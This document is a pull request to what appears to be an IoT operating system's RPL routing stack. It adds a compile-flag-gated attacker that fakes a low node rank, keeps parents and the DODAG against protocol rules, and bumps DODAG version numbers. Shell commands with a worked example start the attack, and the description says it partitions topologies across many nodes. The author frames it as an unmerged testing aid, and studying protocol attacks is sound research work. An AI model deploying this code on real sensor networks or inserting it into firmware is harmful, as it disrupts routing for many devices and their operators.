### PR TITLE
rpl: initial import of an attacker

### DIFF
--- a/examples/gnrc_networking/Makefile
+++ b/examples/gnrc_networking/Makefile
@@ -44,6 +44,8 @@ CFLAGS += -DDEVELHELP
 # DODAG Configuration Options (see the doc for more info)
 # CFLAGS += -DGNRC_RPL_DODAG_CONF_OPTIONAL_ON_JOIN
 
+CFLAGS += -DRPL_ATTACKER
+
 # Change this to 0 show compiler invocation lines by default:
 QUIET ?= 1
 

--- a/sys/include/net/gnrc/rpl.h
+++ b/sys/include/net/gnrc/rpl.h
@@ -630,6 +630,63 @@ static inline void gnrc_rpl_config_pio(gnrc_rpl_dodag_t *dodag, bool status)
 }
 #endif
 
+#ifdef RPL_ATTACKER
+
+/**
+ * @brief in the following operation functions and options for attacks are defined
+ */
+ 
+typedef struct __attribute__((packed)) {
+    uint16_t rank_override;
+    bool keep_parents;
+    bool keep_dodag;
+    bool rank_atk_activated;
+} atk_gnrc_rpl_opt_t;
+
+extern atk_gnrc_rpl_opt_t atk_gnrc_rpl_opts;
+
+/**
+ * @brief initialize the atk_gnrc_rpl_opts options for the attacker
+ */
+void atk_gnrc_rpl_init(void);
+
+/**
+ * @brief set the arbitrary rank that should be used by the attacker
+ * 
+ * @param[in] faked_rank the rank to override the real rank
+ */
+void atk_gnrc_rpl_set_rank(uint16_t faked_rank);
+
+/**
+ * @brief set if parents should be kept
+ * 
+ * @param[in] keep tells if parents should be kept
+ */
+void atk_gnrc_rpl_rank_parents(bool keep);
+
+/**
+ * @brief set if the DODAG should be kept
+ * 
+ * @param[in] keep tells if a DODAG remains after local repair
+ */
+void atk_gnrc_rpl_dodag(bool keep);
+
+/**
+ * @brief set if a rank attack should be performed
+ * 
+ * @param[in] attack tells if the attack should start
+ */
+void atk_gnrc_rpl_rank_activate(bool attack);
+
+/**
+ * @brief initialize the atk_gnrc_rpl_opts options for the attacker
+ * 
+ * @param[out] opt writes the current atk options to the given struct
+ */
+void atk_gnrc_rpl_get_options(atk_gnrc_rpl_opt_t* opt);
+
+#endif
+
 #ifdef __cplusplus
 }
 #endif

--- a/sys/include/net/gnrc/rpl.h
+++ b/sys/include/net/gnrc/rpl.h
@@ -652,35 +652,47 @@ void atk_gnrc_rpl_init(void);
 
 /**
  * @brief set the arbitrary rank that should be used by the attacker
- * 
+ *
  * @param[in] faked_rank the rank to override the real rank
  */
 void atk_gnrc_rpl_set_rank(uint16_t faked_rank);
 
 /**
  * @brief set if parents should be kept
- * 
+ *
  * @param[in] keep tells if parents should be kept
  */
 void atk_gnrc_rpl_rank_parents(bool keep);
 
 /**
  * @brief set if the DODAG should be kept
- * 
+ *
  * @param[in] keep tells if a DODAG remains after local repair
  */
 void atk_gnrc_rpl_dodag(bool keep);
 
 /**
  * @brief set if a rank attack should be performed
- * 
+ *
  * @param[in] attack tells if the attack should start
  */
 void atk_gnrc_rpl_rank_activate(bool attack);
 
 /**
+ * @brief increment the DODAG version number
+ *
+ * @param[in] instance_id the instance of the DODAG to increment the version
+ */
+void atk_gnrc_rpl_version_increment(uint8_t instance_id);
+
+/**
+ * @brief increment the DODAG version number of all instances
+ */
+void atk_gnrc_rpl_version_increment_all(void);
+
+/**
  * @brief initialize the atk_gnrc_rpl_opts options for the attacker
- * 
+ *
  * @param[out] opt writes the current atk options to the given struct
  */
 void atk_gnrc_rpl_get_options(atk_gnrc_rpl_opt_t* opt);

--- a/sys/net/gnrc/routing/rpl/gnrc_rpl.c
+++ b/sys/net/gnrc/routing/rpl/gnrc_rpl.c
@@ -386,6 +386,26 @@ void atk_gnrc_rpl_rank_activate(bool attack)
     atk_gnrc_rpl_opts.rank_atk_activated = attack;
 }
 
+void atk_gnrc_rpl_version_increment(uint8_t instance_id)
+{
+    for (uint8_t i = 0; i < GNRC_RPL_INSTANCES_NUMOF; ++i) {
+        if ((gnrc_rpl_instances[i].state != 0)
+             && (gnrc_rpl_instances[i].id == instance_id)) {
+                 gnrc_rpl_instances[i].dodag.version = GNRC_RPL_COUNTER_INCREMENT(gnrc_rpl_instances[i].dodag.version);
+                 return;
+        }
+    }
+}
+
+void atk_gnrc_rpl_version_increment_all(void)
+{
+    for (uint8_t i = 0; i < GNRC_RPL_INSTANCES_NUMOF; ++i) {
+        if (gnrc_rpl_instances[i].state != 0) {
+            gnrc_rpl_instances[i].dodag.version = GNRC_RPL_COUNTER_INCREMENT(gnrc_rpl_instances[i].dodag.version);
+        }
+    }
+}
+
 void atk_gnrc_rpl_get_options(atk_gnrc_rpl_opt_t* opt)
 {
     *opt = atk_gnrc_rpl_opts;

--- a/sys/net/gnrc/routing/rpl/gnrc_rpl.c
+++ b/sys/net/gnrc/routing/rpl/gnrc_rpl.c
@@ -84,6 +84,11 @@ kernel_pid_t gnrc_rpl_init(kernel_pid_t if_pid)
     gnrc_ipv6_netif_add_addr(if_pid, &ipv6_addr_all_rpl_nodes, IPV6_ADDR_BIT_LEN, 0);
 
     gnrc_rpl_send_DIS(NULL, (ipv6_addr_t *) &ipv6_addr_all_rpl_nodes);
+
+#ifdef RPL_ATTACKER
+    atk_gnrc_rpl_init();
+#endif
+
     return gnrc_rpl_pid;
 }
 
@@ -348,6 +353,44 @@ uint8_t gnrc_rpl_gen_instance_id(bool local)
     mutex_unlock(&_inst_id_mutex);
     return instance_id;
 }
+
+#ifdef RPL_ATTACKER
+
+atk_gnrc_rpl_opt_t atk_gnrc_rpl_opts;
+
+void atk_gnrc_rpl_init(void)
+{
+    atk_gnrc_rpl_opts.rank_override         = GNRC_RPL_INFINITE_RANK;
+    atk_gnrc_rpl_opts.keep_parents          = false;
+    atk_gnrc_rpl_opts.keep_dodag            = false;
+    atk_gnrc_rpl_opts.rank_atk_activated    = false;
+}
+
+void atk_gnrc_rpl_set_rank(uint16_t faked_rank)
+{
+    atk_gnrc_rpl_opts.rank_override = faked_rank;
+}
+
+void atk_gnrc_rpl_rank_parents(bool keep)
+{
+    atk_gnrc_rpl_opts.keep_parents = keep;
+}
+
+void atk_gnrc_rpl_dodag(bool keep)
+{
+    atk_gnrc_rpl_opts.keep_dodag = keep;
+}
+
+void atk_gnrc_rpl_rank_activate(bool attack)
+{
+    atk_gnrc_rpl_opts.rank_atk_activated = attack;
+}
+
+void atk_gnrc_rpl_get_options(atk_gnrc_rpl_opt_t* opt)
+{
+    *opt = atk_gnrc_rpl_opts;
+}
+#endif
 
 /**
  * @}

--- a/sys/net/gnrc/routing/rpl/gnrc_rpl_dodag.c
+++ b/sys/net/gnrc/routing/rpl/gnrc_rpl_dodag.c
@@ -254,7 +254,12 @@ void gnrc_rpl_local_repair(gnrc_rpl_dodag_t *dodag)
                          (uint8_t *) ipv6_addr_unspecified.u8,
                          sizeof(ipv6_addr_t));
     }
-
+#ifdef RPL_ATTACKER
+    if (atk_gnrc_rpl_opts.rank_atk_activated
+        && atk_gnrc_rpl_opts.keep_dodag) {
+        return;
+    }
+#endif
     if (dodag->my_rank != GNRC_RPL_INFINITE_RANK) {
         dodag->my_rank = GNRC_RPL_INFINITE_RANK;
         trickle_reset_timer(&dodag->trickle);
@@ -346,8 +351,16 @@ static gnrc_rpl_parent_t *_gnrc_rpl_find_preferred_parent(gnrc_rpl_dodag_t *doda
 #endif
 
     }
-
+#ifdef RPL_ATTACKER
+    if (atk_gnrc_rpl_opts.rank_atk_activated) {
+        dodag->my_rank = atk_gnrc_rpl_opts.rank_override;
+    }
+    else {
+        dodag->my_rank = dodag->instance->of->calc_rank(dodag->parents, 0);
+    }
+#else
     dodag->my_rank = dodag->instance->of->calc_rank(dodag->parents, 0);
+#endif
     if (dodag->my_rank != old_rank) {
         trickle_reset_timer(&dodag->trickle);
     }
@@ -355,7 +368,14 @@ static gnrc_rpl_parent_t *_gnrc_rpl_find_preferred_parent(gnrc_rpl_dodag_t *doda
     LL_FOREACH_SAFE(dodag->parents, elt, tmp) {
         if (DAGRANK(dodag->my_rank, dodag->instance->min_hop_rank_inc)
             <= DAGRANK(elt->rank, dodag->instance->min_hop_rank_inc)) {
+#ifdef RPL_ATTACKER
+            if (atk_gnrc_rpl_opts.rank_atk_activated 
+                && !atk_gnrc_rpl_opts.keep_parents) {
+                gnrc_rpl_parent_remove(elt);
+            }
+#else
             gnrc_rpl_parent_remove(elt);
+#endif
         }
     }
 

--- a/sys/shell/commands/sc_gnrc_rpl.c
+++ b/sys/shell/commands/sc_gnrc_rpl.c
@@ -352,6 +352,94 @@ int _gnrc_rpl_set_pio(char *inst_id, bool status)
 }
 #endif
 
+#ifdef RPL_ATTACKER
+
+int _atk_gnrc_rpl_rank(char* fake_rank)
+{
+    uint16_t rank = (uint16_t) atoi(fake_rank);
+    atk_gnrc_rpl_set_rank(rank);
+    return 0;
+}
+
+int _atk_gnrc_rpl_rank_parents(bool keep)
+{
+    atk_gnrc_rpl_rank_parents(keep);
+    return 0;
+}
+
+int _atk_gnrc_rpl_dodag(bool keep)
+{
+    atk_gnrc_rpl_dodag(keep);
+    return 0;
+}
+
+int _atk_gnrc_rpl_rank_activate(bool attack)
+{
+    atk_gnrc_rpl_rank_activate(attack);
+    return 0;
+}
+
+int _atk_gnrc_rpl_init(void)
+{
+    atk_gnrc_rpl_init();
+    return 0;
+}
+
+int _atk_gnrc_rpl_prt_help(void)
+{
+    puts("\n\t-= RPL attacker help =-\n");
+    puts("* atk                      - prints the currently set options for the attacker");
+    puts("* atk help                 - prints this help");
+    puts("* atk init                 - initializes the attacking options with default values,"
+                                      "this happen automatically when using `rpl init`");
+    puts("* atk rank <value>         - sets the attacker override rank to the given value");
+    puts("* atk dodag [keep|loose]");
+    puts("             keep          - sets that the DODAG remains after a local repair");
+    puts("                  loose    - sets that the DODAG is removed after a local repair"
+                                      " (default RPL behaviour)");
+    puts("* atk parents [keep|loose]");
+    puts("               keep        - sets that the prefered parent remains, even if the"
+                                      " rank order is broken");
+    puts("                    loose  - sets that the prefered parent is removed if the rank"
+                                      " order is broken (default RPL behaviour)");
+
+    puts("* atk rank [start|stop]");
+    puts("            start          - starts the attack using the set options");
+    puts("                  stop     - stops the attack (default RPL behaviour)");
+    puts("");
+
+    puts("One exemplary scenario would be to:\n 1. set an arbitrary rank: `rpl atk rank 300`"
+    "\n 2. set that the DODAG reamins after local repair: `rpl atk dodag keep`"
+    "\n 3. start the attack: `rpl atk rank start`."
+    "\nWhen updating its prefered parent the attacker will take the set rank (300)."
+    "\nAfter some time the prefered parent will disappear from the parent list,"
+    "\nbut the attacker will remain the DODAG and spread DIOs announcing a rank of 300."
+    );
+
+    puts("");
+    return 0;
+}
+
+int _atk_gnrc_rpl_prt_options(void)
+{
+    atk_gnrc_rpl_opt_t opt;
+    atk_gnrc_rpl_get_options(&opt);
+    puts("\n\t-= RPL attacker options =-");
+    if (atk_gnrc_rpl_opts.rank_override == GNRC_RPL_INFINITE_RANK) {
+        puts("rank_override:\t\t [GNRC_RPL_INFINITE_RANK]");
+    } else {
+        printf("rank_override:\t\t [%d]\n", atk_gnrc_rpl_opts.rank_override);
+    }
+    printf("keep_parents:\t\t [%s]\n", atk_gnrc_rpl_opts.keep_parents?"true":"false");
+    printf("keep_dodag:\t\t [%s]\n", atk_gnrc_rpl_opts.keep_dodag?"true":"false");
+    printf("rank_atk_activated:\t [%s]\n", atk_gnrc_rpl_opts.rank_atk_activated?"true":"false");
+
+    puts("");
+    return 0;
+}
+
+#endif
+
 int _gnrc_rpl(int argc, char **argv)
 {
     if ((argc < 2) || (strcmp(argv[1], "show") == 0)) {
@@ -440,6 +528,61 @@ int _gnrc_rpl(int argc, char **argv)
     puts("* show\t\t\t\t\t- show instance and dodag tables");
     return 0;
 }
+
+#ifdef RPL_ATTACKER
+    else if (strcmp(argv[1], "atk") == 0) {
+        if (argc > 2) {
+            if (strcmp(argv[2], "rank") == 0) {
+                if (strcmp(argv[3], "start") == 0) {
+                    _atk_gnrc_rpl_rank_activate(true);
+                    return 0;
+                }
+                else if (strcmp(argv[3], "stop") == 0) {
+                    _atk_gnrc_rpl_rank_activate(false);
+                    return 0;
+                }
+                else {
+                    _atk_gnrc_rpl_rank(argv[3]);
+                    return 0;
+                }
+            }
+            else if (strcmp(argv[2], "dodag") == 0) {
+                if (strcmp(argv[3], "keep") == 0) {
+                    _atk_gnrc_rpl_dodag(true);
+                    return 0;
+                }
+                else if (strcmp(argv[3], "loose") == 0) {
+                    _atk_gnrc_rpl_dodag(false);
+                    return 0;
+                }
+            }
+            else if (strcmp(argv[2], "parents") == 0) {
+                if (strcmp(argv[3], "keep") == 0) {
+                    _atk_gnrc_rpl_rank_parents(true);
+                    return 0;
+                }
+                else if (strcmp(argv[3], "loose") == 0) {
+                    _atk_gnrc_rpl_rank_parents(false);
+                    return 0;
+                }
+            }
+            else if (strcmp(argv[2], "init") == 0) {
+                _atk_gnrc_rpl_init();
+                _atk_gnrc_rpl_prt_options();
+                return 0;
+            }
+            else if (strcmp(argv[2], "help") == 0) {
+                _atk_gnrc_rpl_prt_help();
+                return 0;
+            }
+        }
+        else {
+            _atk_gnrc_rpl_prt_options();
+            return 0;
+        }
+    }
+#endif
+
 /**
  * @}
  */


### PR DESCRIPTION
Rationale:
This RP introduces the possibility to attack RPL.
Right now it is possible to perform a rank-attack pretending to have a deliberately low rank.
Doing so will attract neighbour nodes to choose the Attacker as prefered parent, causing a partition of the topology.
This attack can easily affect a very large number of nodes.

Attacking can be triggered using shell commands.
**edit:** use the `gnrc_networking` example, and
just type `rpl atk help` in the shell to see how to perform basic attacks.

**This RP is not meant to be merged to RPL and will remain WIP, but I think its probably useful for testing.**

And now have fun :).

**edit:** ~~(A version number attack is on the way)~~ added.
